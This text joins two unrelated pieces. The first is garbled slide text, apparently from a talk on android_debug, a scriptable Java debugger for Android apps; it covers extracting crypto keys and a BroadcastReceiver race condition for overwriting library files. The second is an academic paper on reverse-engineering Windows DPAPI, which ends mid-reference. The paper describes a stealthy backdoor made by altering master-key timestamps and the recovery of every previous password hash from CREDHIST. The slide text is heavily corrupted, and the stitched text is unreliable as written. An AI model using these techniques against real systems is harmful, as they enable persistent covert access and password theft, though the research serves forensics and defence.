JavaSDebuggerSvsSNativeSDebugger•NativeSdebuggersSbgdbiimmunitycSdirectlySaccessS•SMSinstructionsSandSrawSmemory•JavaSDebugSInterfaceSprovidesShelperSfunctionsifunctionality•tebuggerJunderstandsJwhatJObjectsJare•sall_invokeJmethod•View_changeJlocalJvariables•qccessJtoJ‘this’Jobject•ViewJtheJbytecodeJatJtheJcurrentJbreakpoint
Thursday, September 19, 13
•ndroid’sSJVMgTISImplementation•NotSallSJDWPSoperationsSareSimplemented•NoSdocumentationfSmustSlookSthroughSsource•httpsj__github]com_plattypus_qndroid[d]‘]a_ra]‘_blob_master_dalvik_vm_jdwp_'dwpxandler]cpp••pplicationsScrashShardSwhenSoperationsSareSnotSimplemented
Thursday, September 19, 13
•ndroidtSadb•adbSisStheStransportS•ndroidStoolsStoS•ndroidSdevice•WhenSrunningSadbfSlaunchesS‘adbgserver’S•slientJStoolTWJServerJSadb[serverTJarchitecture•”istensJonJportJtcpje‘cg•SimpleJbinaryJprotocol•MustSutilizeSanSadbScommandStoSinitiateSaSJavaSdebugSsession
Thursday, September 19, 13
•ndroidtSHowSitSallSworks•xostJ[nJqndroidJhappensJoverJadb[serverJStcpje‘cgT•TellJtheJapplicationJyouJwantJtoJdebugJit•qndroidJOSJflagsJtheJapplicationJtoJwaitJforJdebugger•”aunchJtheJapplication•TellJqndroidJOSJtoJbindJaJ'tWPJPytJtoJaJlocalJport•adb[serverJopensJupJlocalhostj[PORT]•qttachJtheJ'avaJdebuggerJtoJaJremoteJdebuggingJinstanceJofJlocalhostj[PORT]•qllJ'tWPJcommunicationJisJforwardedJoverJtheJportWJthroughJadb[serverJtoJtheJdebuggingJ'Vÿ
Thursday, September 19, 13
WhySdidSISstartSthisSprojecty
Thursday, September 19, 13
obFUdKscation
Thursday, September 19, 13
SpecificSProblem••ndroidSclientSgxSSSLb•ESbraw_datafSprivate_keyccSgxSServer•tumbKJSorJisJitoJsnowden_NSq_cryptoT•HowSdoSISfindSprivate_keyy•dexbjarJVJjd[guiJVJeclipseJtoJtheJrescue
Thursday, September 19, 13
Thursday, September 19, 13
Problems•HowSdoSyouSbreakSonScoreS•ndroidiJavaSmethodsySbjavaxhcryptohCipherc•HowSdoSyouSknowSwhereStoSbreaky•ManuallySsteppingSthroughSisSverySinefficient•SteppingSdoesn’tSevenSalignSproperlySwithSsource
Thursday, September 19, 13
JavaTapiCryptoTap•ThatSwasShardSandStimeSconsuming•CryptoTap•rreakJonJjavax]crypto]sipherJmethods•PrintJvariablesJtoJstdout•JavaTap•weneralJcaseWJwithJconfigJfileJthatJspecifiesJmethodsJtoJbreakJon•WorksSwithSOracleSJavaSapplicationsfSbutScausesS•ndroidSapplicationsStoScrashShard
Thursday, September 19, 13
GaveSuphSUntilhhh
Thursday, September 19, 13
•notherSproject•UtilizesSlotsSÿroadcastReceivers•“WhenJyouJuseJregisterReceiverSrroadcastReceiverWJyntentvilterTWJanyJapplicationJmayJsendJbroadcastsJtoJthatJregisteredJreceiver”•MaySleadStoSraceSconditions•WeSneedStoSdetectStheseSreliably•HowSdoSyouSfindSallSÿroadcastReceiversy•NotJdefinedJinJqndroidÿanifest]xmlJlikeJotherJyPs
Thursday, September 19, 13
ÿroadcastReceiverSandSDownloadManager•TypicalSusegcase•RegisterJrroadcastReceiverJtoJperformJsomeJactionJwhenJaJdownloadJisJcomplete•OnceJtriggeredWJthisJSxOU”tJqueryJtheJtownloadÿanagerJtoJobtainJtheJfilenameJofJwhatJwasJdownloaded•unqueueJtheJtownloadÿanagerJtoJdownloadJaJspecificJfile•OnceJthisJisJcompletedWJtheJrroadcastReceiverJwillJseeJtheJ‘townloadÿanager]qsTyON_tOWN”Oqt_sOÿP”uTu’JbroadcastJandJthenJperformJsomeJaction]
Thursday, September 19, 13
SpecificScaseSgSCustomSDownloadManager••pplicationScanSliveSupdateSfilesSinSilibi•UtilizesScustomSDownloadManagerStoSdownloadSfile•StoredStheSdownloadedSfilenameSinStheSÿroadcastReceiverSIntent•CopySdownloadedSfileStoSilibi•IfSISsendStheSÿroadcastSwithStheScorrectSIntentSwithSmySfilenamefSitSwillSoverrideSinSilibi
Thursday, September 19, 13
MeetSandroid_debug
Thursday, September 19, 13
SampleSCodetShit_tracerhrb
Thursday, September 19, 13
android_debug••ndroidSscriptableSdebuggingSframework•RubySgemSbJRubyc•RequiresSOracleSJavaSbit’sStheSonlySJavaSimplementationSthatSimplementsSJDIS•PI•HelperSfunctionsSto•”aunchJandJattachJtoJprocesses•ProgrammaticallyJmanipulateJapplicationJflow
Thursday, September 19, 13
•rchitecture
Thursday, September 19, 13
InterestingSconcepts•CanScallSarbitrarySmethodsSatSaSbreakpoint•CanSviewSandSmodifySvariables•CanSstepSthroughSaSmethodSandSprintSvariablesSchanges
Thursday, September 19, 13
Nuances•ÿustJuseJOracleJ'avaJSonlyJ'avaJthatJimplementsJcom]sun]jdi]UJclassesT•OnJbreakpointWJyouJshouldJaccessJvariablesWJmethodsWJlocationsJviaJtheJinitialJRqndroidtebugjjtebuggerRJ[JthisJisJdueJtoJstepping•”inuxJusersJ•ÿustJuseJOracleJ't“•ÿayJneedJtoJincludeJtools]jarJinJNs”qSSPqTx•sallingJmethodsJisJfunky•sanJonlyJcallJaJmethod•reJcarefulJofJwhereJbreakpointsJareJScallingJaJmethodJÿUSTJNOTJtriggerJanotherJbreakpointT
Thursday, September 19, 13
ToolsitemplatesSwritten•hit_tracehrb•invoke_methodhrb•print_variableshrb•change_variablehrb
Thursday, September 19, 13
•ndroidSJDWPSHopes•ImplementSbytecodeSfunctionality••bilityStoScreateSexitSbreakpoints
Thursday, September 19, 13
QuestionsyMathewSRowleytwittertSzwunteemathewzmatasanohcomwwwhgithubhcomiwuntee
Thursday, September 19, 13Recovering Windows Secrets and EFS Certificates Offline
Elie Burzstein
Stanford UniversityJean Michel Picod
EADS
Abstract
In this paper we present the result of our reverse-
engineering of DPAPI, the Windows API for safe data
storage on disk. Understanding DPAPI was the major
roadblock preventing alternative systems such as Linux
from reading Windows Encrypting File System (EFS)
files. Our analysis of DPAPI reveals how an attacker
can leverage DPAPI design choices to gain a nearly silent
backdoor. We also found a way to recover all previous
passwords used by any user on a system. We implement
DPAPI data decryption and previous password extraction
in a free tool called DPAPIck. Finally, we propose a back-
wards compatible scheme that addresses the issue of pre-
vious password recovery.
1 Introduction
DPAPI (Data Protection Application Programming Inter-
face) is the cryptographic programming interface offered
by Microsoft since Windows 2000 for safe storage of
sensitive data on disk. In a nutshell, DPAPI is a crypto-
graphic scheme that provides a transparent way to encrypt
data with a key derived in a secure manner from the user
password. Many popular applications such as GTalk,
Windows Mail, Internet Explorer and system components
such as Encrypting File System (EFS) rely on DPAPI
to securely store their data on disk. Surprisingly, this
key component of Windows security has very sparse
documentation, covering only its public interface and
giving no details of its internal structure. The documen-
tation instead states that the DPAPI “blob” that holds the
encrypted data is “ an opaque structure ” [8]. Because of
this lack of documentation and the extreme complexity
of DPAPI’s internal structure, reverse-engineering DPAPI
and building a portable implementation has been a long
lasting challenge, on-going for almost 10 years. Many
such attempts were made by various open-source teams
hoping to provide full Windows emulation and full NTFS
support. However, no team has been able to complete
a fully working implementation. For example, in 2005,Kees Cook from the Wine project wrote about the DPAPI
blob : “ The encryption is symmetric, but the method is
unknown. However, since it is keyed to the machine and
the user, it is unlikely that the values would be portable ”
in one of the Wine header files.
There are at least three main reasons why DPAPI
needs to be reverse-engineered and re-implemented:
First DPAPI is used to encrypt sensitive information.
Therefore, until DPAPI is completely understood, there is
no hope for a full implementation of the NTFS file system
because EFS private keys cannot be decrypted. Without
a re-implementation, emulators like Wine will not be
able to fully support Windows core applications such as
Internet Explorer, because they cannot access protected
data such as stored passwords. Secondly, without a
proper re-implementation, it is impossible to migrate
offline data stored under EFS from one disk to another,
since the files cannot be decrypted. Accordingly, it is im-
possible to build efficient Windows offline forensic tools
because they do not have access to EFS files and sensitive
information. Finally, DPAPI is extensively used by many
popular applications as a cryptographic blackbox for
data-protection, thus making its security a legitimate
concern. Without being fully reverse engineered, and in
the absence of source code, it is impossible to vouch for
DPAPI’s security. As this paper shows, auditing DPAPI
yields surprising results.
In this paper, we present what is to the best of our
knowledge the result of the first complete reverse engi-
neering and audit of DPAPI1. We also provide the first
tool that is able to decrypt DPAPI secrets offline in a
generic manner [5]. Other researchers, such as Nir Sofer,
offer tools that only decrypt application specific secrets
[11]. Moreover, we confirmed during our tests that these
tools do not fully handle offline recovery because they do
not have a complete understanding of how DPAPI works.
Therefore, our results will also make these tools better.
1We did present the preliminary results of this work, without the im-
proved DPAPI scheme, at BlackHat DC 2010
1
More precisely, by reverse-engineering DPAPI, we
were able to accomplish three breakthroughs: First, we
were able to decrypt DPAPI data offline. This allows us
to create the long-awaited tool that can perform forensics
on DPAPI data and provide a way to migrate EFS en-
crypted files. This breakthrough will also positively im-
pact the open source community, as being able to decrypt
and access EFS certificates will open the door to a full
implementation of NTFS on non-Windows systems. Sec-
ond, we found a way to exploit a lack of verification in
DPAPI design that allows attackers to replace the master
key with a key of their choice and put a process in place
that prevents this key from expiring. This allows attackers
to backdoor DPAPI in an nearly silent way that guarantees
their ability to decrypt EFS files and DPAPI secrets, even
if the user changes passwords or patches the system. The
method only requires tampering with DPAPI timestamps.
Finally, we were able to exploit DPAPI design choices
to recover the hashes of all previous passwords used by
any users on the system. To demonstrate the feasibility of
our recovery method, we implemented the recovery of the
hashes in our tool, DPAPIck, and the hash cracking in our
password cracker, called Nightingale.
To address the recovery of previous user passwords
issue, we also propose a backwards compatible improved
password encryption scheme that does not rely on previ-
ous passwords.
2 Background
Microsoft has added numerous mechanisms to Windows
to protect user data over the years. Figure 1 depicts a high
level overview of the relationships between the key secu-
rity mechanisms that interact with DPAPI.
This diagram emphasizes the complex inter-relation be-
tween these mechanisms, with DPAPI playing a central
role as the API responsible for tying the encryption key to
the user password. The following three mechanisms are
linked to DPAPI:
•Crypto API : The Windows crypto API provides an im-
plementation of the main cryptographic algorithms, in-
cluding SHA1, 3DES and AES. DPAPI uses this API
as its default cryptographic provider.
•EFS:The Encrypting File System (EFS) is a “filter” that
provides filesystem-level encryption on Windows that
was introduced in version 3.0 of NTFS. It is used to
encrypt specific files, not the entire volume like Bit-
Locker (see below). The private key needed to decrypt
Application
DPAPIcryptoAPIcrypt32.dllLocal Security AuthoritycryptoAPIcrypt32.dllDPAPIdata blobMaster keyEFS Encrypted fileEFSEFSuser private keySAM(registery)
Kernel LandUser LandFigure 1: Relationships between Windows security mech-
anisms
EFS files is encrypted on the disk through DPAPI. Be-
ing able to decrypt DPAPI data offline will therefore
allow alternative OSes such as Linux and also forensic
tools to read encrypted files.
•Security Accounts Manager : The Security Accounts
Manager (SAM) is the Windows password database. It
is stored as a registry file and contains LM or NTLM
hashes of user passwords.
For completeness, we also describe the two following
data security mechanisms even though they do not interact
with DPAPI, since they are also used to protect files:
•BitLocker : BitLocker Drive Encryption is a full-disk
encryption feature included in some editions of Win-
dows Vista, Windows 7, and Windows Server 2008. By
default, it uses 128-bit AES encryption in CBC mode.
It relies on a Trusted Platform Module (TPM) to store
its keys.
•CardSpace : Windows CardSpace, also known at In-
foCard, is Microsoft’s client software for the Identity
Metasystem. It aims at securely storing users’ digital
identities with a consistent UI.
3 DPAPI overview
In this section we provide an overview of how DPAPI
works. We detail the main DPAPI structures and their
uses. We also explore the relations that exist between the
three different types of keys used by DPAPI. In addition,
2
we show how to decrypt DPAPI-protected data and also
the changes to DPAPI across versions of Windows.
3.1 DPAPI functions
DPAPI exposes two main functions [8] to applica-
tions, CryptProtectData() andCryptUnprotectData() .
CryptProtectData() takes the supplied data, encrypts
them and returns a DPAPI blob . Conversely, CryptUn-
protectData() decrypts a DPAPI blob and return the data
in the clear. The documentation refers to the DPAPI blob
as an “ opaque protected data blob ” and therefore does
not explain its structure or how the data are encrypted.
This lack of information has persisted since the release
of Windows 2000/XP and prevented the development of
offline forensic tools and the recovery of EFS encrypted
files.
To get a sense of what DPAPI does, we will examine the
parameters supplied to the functions exposed by DPAPI.
Since these two functions are very similar, we will only
discuss the parameters for CryptUnprotectData(), as it is
enough to illustrate what is supplied by the user:
BOOL WINAPI C r y p t U n p r o t e c t D a t a (
DATA BLOB∗pDataIn ,
LPCWSTR∗ppszDataDescr ,
DATA BLOB∗p O p t i o n a l E n t r o p y ,
PVOID pvReserved ,
CRYPTPROTECT PROMPTSTRUCT
∗p P r o m p t S t r u c t ,
D W O R D dwFlags ,
DATA BLOB∗pDataOut )
•pDataIn : is a pointer to a data blob that contains the
encrypted data.
•ppszDataDescr : is an optional description that will be
stored along with the encrypted data in the data blob, as
we will see below.
•pOptionalEntropy : is optional entropy provided by
the application that will be added to the key derivation
as explained in Sec 4. By default, DPAPI already uses
different entropy for each blob, so in practice adding
additional entropy does not improve encryption secu-
rity. According to the documentation, its purpose is to
allow applications relying on DPAPI to mitigate the risk
of having their secrets stolen by another application. In
our test, we found that only GTalk used the conditional
entropy, with its value is stored in a registry key and
therefore not a real hurdle for the attacker.
•pvReserved : Unused currently.•pPromptStruct : Used to prompt a window to the user
that requests an additional password for the user. This
password will be used to derive the DPAPI blob key if
it exists. To the best of our knowledge, no application
use this feature.
•dwFlags : Various flags that provide the ability to test
the validity of the key and reset it.
•pDataOut : is a pointer to the data blob that contains
the data in the clear.
From this function call, it is very difficult to tell how
DPAPI operates, aside from the implication that DPAPI
must use the user login password to encrypt the data be-
cause DPAPI function calls do not require a key. We now
examine the complex derivation scheme that DPAPI uses
to tie the user login password to the data blob and then
take a look at DPAPI data structures and the decryption
process.
3.2 Derivation scheme
Figure 2 depicts how DPAPI uses a derivation scheme
with three types of keys to tie the user password to the
encrypted data.
Pre KeyUser PasswordMaster-keyBlob keyBlob keyBlobkeySensitive dataSensitive dataSensitive data
Figure 2: Derivation scheme overview
As depicted in the figure 2, DPAPI uses the following
three kinds of keys to tie the user password to the user
sensitive data:
•ThePre key : This key is used to decrypt the master-
key and is derived from the user password. This level of
encryption serves two purposes: first it allows users to
change their passwords without having to change all the
3
DPAPI keys. Second, it allows Windows to renew the
master key without forcing users to change their pass-
words.
•TheMaster key : This is a 512-bit random key used to
derive all of the DPAPI Blob keys. This key is renewed
every three months by Windows. This renewal process
is passive and only occurs when DPAPI is called. This
passive process means that every master-key ever cre-
ated needs to be kept, because DPAPI has no way to tell
if a master-key is still used by a blob. Accordingly, all
the master keys are stored in the user keyring and a way
to select the current master key has been implemented
by Microsoft. We discuss how this master key selection
process can be exploited to backdoor DPAPI in section
5.
•TheBlob key : This key is directly used to encrypt and
decrypt the data. This level of encryption exists to allow
each program to add an additional password and/or a
second salt, like Google does for GTalk. As explained
previously, this information is passed as a parameter to
DPAPI functions and therefore is not stored on disk.
Instead, it must be stored in the data blob itself.
As one may observe, the entire cryptographic scheme
depends on the Pre key, derived from the user password.
This makes it challenging to migrate user access to en-
crypted files across a password change. To address this
issue, the straightforward solution would be to re-encrypt
all the master keys with the new password. However,
Microsoft chose a different approach that consists of re-
encrypting only the last key(s). We believe that the ratio-
nale behind this decision is to ensure that users do not wait
too long after changeing their passwords, as re-encrypting
all master key may result in unacceptable wait times. Our
benchmark with DPAPIck, presented in Sec. 7, supports
this hypothesis. The decision to re-encrypt only a few
master keys requires that all previous password hashes
be stored. Otherwise, users will not be able to access
their data encrypted with a master key that was not re-
encrypted with their new password. Storing all the pre-
vious password hashes is the only option because, as ex-
plained earlier, Windows has no way to tell if a given mas-
ter key is still used by a DPAPI blob. As undesirable as
this scheme seems, we observed it in action in Windows:
all the previous password hashes are stored in a file called
CREDHIST which is located in the user key-ring direc-
tory. We discuss how we leveraged this design to recover
all of the previous password hashes belonging to a user in
section 5 and describe our implementation in section 7.3.3 DPAPI Key structures
DPAPI uses two main data structures: the data blob and
themaster key blob . In this section we take a closer look
at the key fields present in these structures. The reader
interested in a more complete description of DPAPI data-
structures and algorithms can find it in our technical report
[2].
3.3.1 The Data Blob Structure
TheData Blob is the opaque structure used by DPAPI to
store the encrypted version of sensitive user-data and the
meta-data required to decrypt them. The main elements
contained in this structure are :
s t r u c t d p a p i b l o b t{
D W O R D c b P r o v i d e r s ;
GUID∗a r r P r o v i d e r s ;
D W O R D cbKeys ;
GUID∗a r r K e y s ;
D W O R D p p s z D a t a D e s c r S i z e ;
WCHAR∗p p sz D a t aD e s c r ;
D W O R D i d C i p h e r A l g o ;
D W O R D idHashAlgo ;
BYTE∗p b S a l t ;
BYTE∗pbEncData ;
BYTE∗pbHMAC;
};
•cbProviders is the number of cryptographic providers.
During our tests, we only found blobs with a single
cryptographic provider.
•arrProviders is the array of the cryptographic
providers’ GUID. This is used to tell DPAPI which
cryptographic provider to use for the cryptographic
functions. We believe this mechanism is used to pro-
vide a way for organization to supply their own cryp-
tographic primitive and be able to use alternative ci-
phers, e.g. “Blowfish” instead of AES, to encrypt data.
It might also be useful to deal with cryptographic regu-
lation.
•arrKeys is the array of master key ID used to encrypt
the data. In theory it seems possible to have multiple
master keys that can encrypt the data. This mechanism
is likely used either for the active domain backup key
system or for the compatibility key. We were unfor-
tunately unable to test these hypotheses, because, as
explained below, we could not force the compatibility
mode.
•ppszDataDescr contains the optional description string
that can be supplied by the developer when calling
4
CryptProtectData() (Sec. 3.1). If the developer sup-
plied NULL then DPAPI stores an empty UTF-16LE
encoded string, ie. ppszDataDescr = L"" and
ppszDataDescrSize = 2 .
•idCipherAlgo is the ID of the algorithm used to en-
crypt the data. The complete list of IDs is avail-
able from Microsoft MSDN here [7]. IDs starting
with0x88 are for hash functions. For example the
ID0x880e is used to denote the SHA512 algorithm
(CALG SHA 512). IDs starting with 0x66 are for
block ciphers. For example the ID 0x6610 is used
for AES 256bit (CALG AES 256).
•idHashAlgo is the ID of the hash algorithm used to
derive the blob key.
•pbSalt is the salt used to derive the key.
•pbEncData is the encrypted data.
•pbHMAC is the HMAC used to ensure the integrity
of the entire blob. Note that there is a second HMAC
encrypted with the key to ensure that the key was not
tampered with.
3.3.2 The Master Key Structure Blob
TheMaster Key Blob is the opaque structure used by
DPAPI to store the user’s long term master-key along
with the meta-data required to decrypt it. Windows
renews it every three months. We were unable to find
where this limit is stored, as explained in Sec. 5, but we
can confirm that this limit is enforced. The master key
file contains five distinct structures.
The master key structure starts with a header used to
identify the master-key. This header contains the follow-
ing two fields:
s t r u c t m a s t e r k e y f i l e h e a d e r s{
D W O R D dwMagic ;
WCHAR szKeyGUID [ 3 6 ] ;
}
In our testing, we only found dwMagic DWORD con-
taining the value 2, which led us to develop two possi-
ble explanations. The first is that dwMagic is a type of
DPAPI version, with Windows XP, Vista and 7 using the
value of 2 and Windows 2000, which was the first edi-
tion of Windows implementing DPAPI, using the value 1.
Alternatively, dwMagic may be used to differentiate the
usage of particular the Master Key blobs by DPAPI ver-
sus other mechanisms, e.g. Protect Storage, which alsouse the identical data-structure. Under the second hypoth-
esis, the dwMagic value of 2 denotes DPAPI usage, while
the value of 1 denotes the Protect Storage system.
szKeyGUID is a UTF-16LE string representing the
master key ID.
TheKeys Info structure contains a set of four fields
that allow the file parser to determine how big subsequent
structures are.
s t r u c t m a s t e r k e y f i l e i n f o s s{
D W O R D dwUnknown ;
DWORD64 cbMasterKey ;
DWORD64 cbMysteryKey ;
DWORD64 dwHMACLen;
};
•dwUnknown : We currently have not determined the
purpose of this field.
•cbMasterKey : This field contains the size of the Mas-
ter key structure.
•cbMysteryKey : This field contains the size of the Mys-
tery key structure.
•dwHMACLen : This field is the HMAC length. When
the HMAC-SHA1 algorithm is used, its value is 0x014.
After these fixed length structures, there are two succes-
sive variable length structures used to store an encrypted
key along with the parameters required to decrypt it. The
first structure is used to store the master key itself, and the
second is used to store what we call the “ Mystery key ”.
This mystery key is the most intriguing structure that we
came across while reversing DPAPI. In regular encryp-
tion/decryption operation, this key plays no role; we did
not observe a case where it was used. A possible expla-
nation behind the existence of this key is backward com-
patibility with Windows 2000, as the key size (256 bits) is
consistent with a RC4 key size.
These two keys are stored in the following structure:
s t r u c t m a s t e r k e y b l o c k s{
D W O R D dwMagic ;
BYTE p b S a l t [ 1 6 ] ;
D W O R D c b I t e r a t i o n ;
D W O R D idMACAlgo ;
D W O R D i d C i p h e r A l g o ;
BYTE pbCipheredKey [ ] ;
};
•dwMagic : This is once again a field that contains an
apparently fixed value. Again, it may be a versioning
or usage-determination mechanism.
5
•pbSalt : This is the salt used to encrypt the key.
•cbIteration : This is the number of hash rounds needed
to derive the key. See table 1 for the value specific to
each Windows version. For the second key, the Mys-
tery key , the number of rounds is 1 on XP and Vista.
•idMACAlgo : This is the ID of the HMAC algorithm
used.
•idCipherAlgo : This is the ID of the algorithm used to
encrypt the key.
•pbCipheredKey : This is the encrypted key along with
its HMAC.
The master key file ends with the following footer
structure, used to identify the user-login password with
which the master key is encrypted:
s t r u c t m a s t e r k e y f i l e f o o t e r s{
D W O R D dwMagic ;
BYTE c r e d H i s t [ 1 6 ] ;
};
•dwMagic : This fixed value field appears again.
•credHist : This is the GUID of the password used when
this blob was encrypted. This GUID corresponds to
the GUID found in the CREDHIST file (See section
6). When a blob is encrypted by the SYSTEM account,
the GUID value is 0x00 because the SYSTEM account
does not have a password.
3.4 Implementation By Windows Versions
At each revision of Windows, Microsoft made some sub-
stantial changes to how DPAPI works. These changes
are summarized in table 1. Windows 7 brought a lot of
changes in terms of algorithms. Moreover, according to
our tests, the number of rounds required to derive the Pre
key on Windows 7 seems to change from one computer
to another. However, this does not create a security issue,
because it is faster to brute force the user password hash
encrypted in NTLM or LANMAN than to brute force the
master key.
Windows XP and Vista use the strongest version of
3DES that requires three keys. This choice has a direct
impact on encryption/decryption performance, because it
forces Windows to execute the PBKDF2 derivation twice,
since the PBKDF2 function outputs 20 bytes of data per
call and Windows needs 32 bytes (8 bytes for each 3DES
key plus 8 bytes for the initialization vector).4 Decrypting a DPAPI blob
Data BlobMaster key blob
 Master Key GUID
PBKDF2 SHA1(user password)UserSHA1(Previous password)
Pre keyEncryptedClear text
 Symmetriccipher decryptionEncryption Cipher + encrypted keykey
Master keySHA-1Salt + optional entropyStrong password
CREDHISTPassword GUIDSalt + nb iterations
Figure 3: DPAPI blob decryption overview
Now that we have laid out how DPAPI works, we
will describe step-by-step how Windows extracts/com-
putes every piece of information that is needed to de-
crypt a DPAPI blob from the user password SHA1 and
the DPAPI blob content itself. The decryption of DPAPI
Blob content takes five steps, as shown in figure 3.
1. Extract the Master key GUID from the Data Blob
structure.
2. Use the Master key GUID to find the correct mas-
ter key file and extract the Salt and the number of
iterations used by the PBKDF2 function. If the blob
was encrypted with one of the user’s previous pass-
words, then CREDHIST needs to be decrypted and
the correct SHA1 needs to be extracted from it.
3. Use the correct SHA1 with the Salt and the number
of iterations to compute the Pre key that has been
used to encrypt the master key.
4. Use the Pre key to decrypt the Master key . The
pre-key is used as a seed for the PBKDF2 function
to compute the 40 bytes need by 3DES. To achieve
this, the PBKDF2 function is called twice.
6
XP Vista 7
PKCS#5 PBKDF2 rounds 4000 24000 V ariable
Symmetric algorithm 3DES-CBC 3DES-CBC AES256-CBC
HMAC algorithm HMAC-SHA1 HMAC-SHA1 HMAC-SHA512
Table 1: Implementation Changes in DPAPI by Windows version
5. Compute the blob-key using PBKDF2 once again.
Here, Microsoft uses a slightly modified version of
HMAC, as the conditional entropy and the optional
password are not part of the message hashed with
the inner padding. Instead, they are appended after
the inner hash when the outer hash is performed.
5 Backdooring DPAPI
Every time DPAPI encrypts data, it looks for the current
master key GUID in a file named Preferred and checks if
the key need to be renewed. If the key does not need to be
renewed, then DPAPI simply uses it. Otherwise, DPAPI
creates a new key, updates the preferred file, and uses the
newly created key. The Preferred file contains only two
fields: the GUID of the master key and a timestamp that
DPAPI uses to determine when to renew the key.
This timestamp field is not protected by any HMAC
mechanism and therefore can be changed arbitrarily. At-
tacker can leverage this lack of verification to extend the
life of a key indefinitely and therefore ensure that they
will be able to decrypt DPAPI blob indefinitely once they
decrypt the current key. While this technique does not
give the attackers more privileges than they already have,
it allows them to sustain access to the computer secret in
a stealthy way. As mentioned earlier, Windows enforces
that the maximum lifetime of a key at three months. We
were unable to determine whether this parameter is stored
somewhere or if it is a hard-coded constant. Therefore,
to extend the lifetime of the key, the attacker must peri-
odically update the timestamp. This can be achieved in
at least three ways that do not trigger anti-virus software:
the attacker can add a program that will be launched by
one of the Windows startup mechanisms, add a service, or
simply use the task scheduler.
6 Recovering Previous Passwords
As explained in Sec 3, DPAPI needs to store the hashes
of all the users previous passwords to guarantee that a
user will be able to access all the data ever encrypted with
Initial Password structure...Current password (n)Password n - 3 structureDecryptPassword n - 2 structurePassword n - 1 structureDecryptDecryptDecrypt
CREDHIST FileFigure 4: CREDHIST file structure overview
DPAPI. These previous hashes are stored in the CRED-
HIST file. Figure 4 presents an overview of the CRED-
HIST file structure. Every time the user changes his pass-
word the previous SHA1 hash is encrypted with the new
one and added at the end of the CREDHIST file. The en-
cryption algorithm used for the CREDHIST is similar to
the one used to encrypt data blob. While the CREHIST
entry structure is very similar to the blob structure (See
Appendix A), two things are worth mentioning about this
structure. First, the user SID, computer SID and account
SID are present in the CREDHIST file because they are
required when decrypting a blob. These fields are present
to enable a global CREDHIST file on the domain con-
troller. Also, the passwordID field is present here and also
in the master key structure, which allows the master key
to be linked a given password. From an attacker’s per-
spective, it worth noting that all the users previous SHA1
hashes are available at the same time and that they are not
salted. This allows an attacker to crack them in parallel
and use rainbow tables to speed up the recovery.
7 DPAPIck
In order to validate that our theoretical understanding of
DPAPI was correct, we implemented a free off-line de-
cryption tool called DPAPIck in C++/C# that is available
for download from www.dpapick.com . DPAPIck al-
lows users to decrypt the master key and the data blob
off-line and to recover the hashes of previous passwords
from the CREDHIST files. In addition to DPAPIck, we
also implemented the cracking of the previous passwords
7
hashes extracted from the CREDHIST in our open source
GPU based password cracker Nightingale. We needed to
provide such an implementation, as standard SHA1 crack-
ers do not work on the CREDHIST since the password
are encoded in UTF-16LE before being hashed. Cur-
rently, Nightingale is able to do about 99M computation
per Tesla 1070C GPU
8 Improving DPAPI scheme
Master key1...Current Master-key  nMaster key n - 3DecryptMaster Key n - 2Master-keyn - 1 DecryptDecryptDecrypt
MASTERHIST File
Figure 5: DPAPI improved scheme
While the CREDHIST mechanism should be elimi-
nated to stop its password leaks, we believe that the
straightforward solution of re-encrypting all master keys
at every password change is not a good option. Therefore
we developed a new scheme to accomplish this goal, with
the goal of backwards compatibility so Microsoft can de-
ploy it as a patch. We also wanted to have a re-encryption
process that requires a constant time without decreasing
DPAPI security. These requirements rule out numerous
options such as changing the key less often, keeping track
of which keys are still used, or assigning a fixed location
to store DPAPI data.
While these requirements seem very strong, we came
up the simple scheme depicted in figure 5 that provides
an interesting trade-off. The key idea behind our scheme
is that instead of using the current password hash to en-
crypt previous hashes, DPAPI should use the current key
to encrypt the previous master keys. This scheme pro-
vides a constant re-encryption time as it only requires the
re-encryption of the last key with the user password hash.
It is also backwards compatible. However, the backwards
compatibility and constant re-encryption time come with
a price: if one application wants to decrypt a blob that was
encrypted with a very old master key, the decryption pro-
cess will be very long. However, this latency can be made
to occur only once, since the blob may be re-encrypted
with the new master-key.
We believe that this tradeoff is acceptable because the
more an application is used, the more its blobs are up-
dated with a recent key. When we presented our findingto Microsoft along with this new scheme, they told us that
it was interesting and they might consider it, subject to
other constraints they must take into account. We spec-
ulate that part of the reason why they may not adopt our
solution lies in the fact that Windows security policy con-
tains an option to prevent users from reusing a previous
password. This means, of course, that Windows must still
store previous user passwords. To deal with this issue, we
believe that Microsoft should remove the CREDHIST file
by using our scheme, modify the security policy exclude
the last n passwords, and encrypt the storage of these n
passwords in a way that make them very hard to crack,
for instance by by storing a hash that uses PBKDF2.
9 Related Work
Slowing down hash functions, like DPAPI does, is a stan-
dard defense. Many password management proposals dis-
cuss how to slow hash functions for slowing down dictio-
nary attacks [3, 4]. These methods are based on the as-
sumption that the attacker has limited computing power.
Several recent papers propose models for how humans
generate passwords [12]. These results apply their mod-
els to speeding dictionary attacks. These methods can be
used to crack user previous passwords faster. Rainbow ta-
bles [9], implemented in standard tools [10], can be also
used to improve the cracking speed. PBKDF2 (Password-
Based Key Derivation Function) is a key derivation func-
tion that is part of RSA Laboratories’ Public-Key Cryp-
tography Standards (PKCS) series, specifically PKCS #5
v2.0 [6]. Finally, others have proposed methods to mi-
grate EFS files offline [1], which we feel are tedious
and error-prone. We feel that DPAPIck is in improvement
upon previous methods in this regard.
10 Conclusion
In this paper, we have presented what is, to the best of
our knowledge, the result of the first complete reverse-
engineering and audit of DPAPI. We also presented the
first tool, DPAPIck, that is able to decrypt DPAPI secrets
offline in a generic manner. We were able to leverage our
knowledge of DPAPI design to find a way to backdoor
DPAPI and demonstrate a very significant attack: recov-
ering all previous passwords for any user.
References
[1] Recoverying efs files offlines. http:
//www.beginningtoseethelight.org/
8
efsrecovery/ . 8
[2] Elie Bursztein and Jean-Michel Picod. Dpapi:
Inner working technical report http://www.
dpapick.com . Technical report, Nightingale
team, 2019. 4
[3] David Feldmeier and Philip Karn. UNIX password
security – 10 years later. In Proceedings of Crypto
1989 , pages 44–63, 1989. 8
[4] J. Alex Halderman, Brent Waters, and Edward W.
Felten. A convenient method for securely managing
passwords. In WWW ’05: Proceedings of the 14th
international conference on World Wide Web , pages
471–479. ACM, 2005. 8
[5] Elie Bursztein Jean-Michel Picod. Dpapick:
Windows offline forensic tool. http://www.
dpapick.com/ , 2010. 1
[6] B. Kaliski. Pkcs #5: Password-based cryptogra-
phy specification. RFC: http://tools.ietf.
org/html/rfc2898 , 2000. 8
[7] Microsoft. Algorithm id table. http:
//msdn.microsoft.com/en-us/
library/aa375549%28VS.85%29.aspx . 5
[8] Microsoft. Windows data protection. MSDN
http://msdn.microsoft.com/en-us/
